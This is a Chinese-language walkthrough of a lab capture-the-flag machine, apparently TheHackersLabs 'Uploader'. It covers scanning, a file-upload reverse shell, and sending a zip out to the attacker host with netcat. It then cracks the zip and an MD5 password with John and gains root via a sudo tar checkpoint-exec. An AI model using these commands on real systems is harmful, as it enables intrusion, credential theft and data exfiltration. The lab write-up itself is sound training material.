TheHackersLabs-Uploader-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
Password:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.155  08:00:27:64:85:d0       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fc:db:36       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.935 seconds (132.30 hosts/sec). 4 responded
❯ export ip=192.168.60.155
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.155:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 14:14 CST
Initiating ARP Ping Scan at 14:14
Scanning 192.168.60.155 [1 port]
Completed ARP Ping Scan at 14:14, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:14
Scanning shieldweb.che (192.168.60.155) [1 port]
Discovered open port 80/tcp on 192.168.60.155
Completed SYN Stealth Scan at 14:14, 0.02s elapsed (1 total ports)
Nmap scan report for shieldweb.che (192.168.60.155)
Host is up, received arp-response (0.00076s latency).
Scanned at 2025-08-24 14:14:53 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:64:85:D0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
           Raw packets sent: 2 (72B) | Rcvd: 3 (314B)

目录枚举

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.155
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 3968]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.60.155/uploads/]
/upload.php           (Status: 200) [Size: 3277]
Progress: 122883 / 1102800 (11.14%)

文件上传

存在一个文件上传的功能

尝试直接上传反弹shell，访问一下/uploads目录中的

监听端口

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from TheHackersLabs-Operator-192.168.60.155-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/TheHackersLabs-Operator~192.168.60.155_Linux_x86_64/2025_08_24-14_16_31-000.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@TheHackersLabs-Operator:/$

在/home目录中存在提示

www-data@TheHackersLabs-Operator:/home$ cat Readme.txt
He guardado mi archivo zip más importante en un lugar secreto.
我已将我最重要的zip文件保存在一个秘密的地方。
www-data@TheHackersLabs-Operator:/home$ ls -al
total 16
drwxr-xr-x  3 root      root      4096 Aug 19 21:49 .
drwxr-xr-x 23 root      root      4096 Aug  7 02:36 ..
-rw-r--r--  1 root      root        66 Aug 19 21:49 Readme.txt
drwxr-x---  5 operatorx operatorx 4096 Aug  8 17:43 operatorx
www-data@TheHackersLabs-Operator:/home$ find / -name *.zip 2>/dev/null
/srv/secret/File.zip

将zip文件下载到本地

www-data@TheHackersLabs-Operator:/home$ nc 192.168.60.100 1234 < /srv/secret/File.zip
---------------------
❯ nc -lvp 1234 > file.zip
listening on [any] 1234 ...
connect to [192.168.60.100] from shieldweb.che [192.168.60.155] 51354

尝试解压一下，很显然需要密码

爆破得到密码121288

❯ 7z x file.zip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:8 OPEN_MAX:10240, ASM

Scanning the drive for archives:
1 file, 430 bytes (1 KiB)

Extracting archive: file.zip
--
Path = file.zip
Type = zip
Physical Size = 430


Enter password (will not be echoed):
ERROR: Wrong password : Credentials/Credentials.txt

Sub items Errors: 1

Archives with Errors: 1

Sub items Errors: 1
❯ zip2john file.zip >hash
ver 2.0 file.zip/Credentials/ is not encrypted, or stored with non-handled compression type
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 64 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
121288           (file.zip/Credentials/Credentials.txt)
1g 0:00:00:00 DONE (2025-08-24 14:50) 7.692g/s 126030p/s 126030c/s 126030C/s 123456..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

再次解压

❯ 7z x file.zip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:8 OPEN_MAX:10240, ASM

Scanning the drive for archives:
1 file, 430 bytes (1 KiB)

Extracting archive: file.zip
--
Path = file.zip
Type = zip
Physical Size = 430


Would you like to replace the existing file:
  Path:     ./Credentials/Credentials.txt
  Size:     0 bytes
  Modified: 2025-08-19 06:28:04
with the file from archive:
  Path:     Credentials/Credentials.txt
  Size:     67 bytes (1 KiB)
  Modified: 2025-08-19 06:28:04
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y


Enter password (will not be echoed):
Everything is Ok

Folders: 1
Files: 1
Size:       67
Compressed: 430
❯ cat Credentials/Credentials.txt
User: operatorx

Password: d0970714757783e6cf17b26fb8e2298f

用户提权

切换用户登录一下

实际上直接用password是登录不上的，这是md5的hash，再次爆破得到112233

www-data@TheHackersLabs-Operator:/home$ su  operatorx
Password:

su: Authentication failure
www-data@TheHackersLabs-Operator:/home$ su operatorx
Password:
operatorx@TheHackersLabs-Operator:/home$ cd ~
operatorx@TheHackersLabs-Operator:~$ cat user.txt
4a8b1c3d9e2f7a6b5c8d3e1f2a7b6c9d

Root提权

用户存在sudo权限，直接Gtfobins命令提权了

operatorx@TheHackersLabs-Operator:~$ sudo -l
Matching Defaults entries for operatorx on TheHackersLabs-Operator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User operatorx may run the following commands on TheHackersLabs-Operator:
    (ALL) NOPASSWD: /usr/bin/tar
operatorx@TheHackersLabs-Operator:~$ sudo /usr/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
/usr/bin/tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
e1f9c2e8a1d8477f9b3f6cd298f9f3bd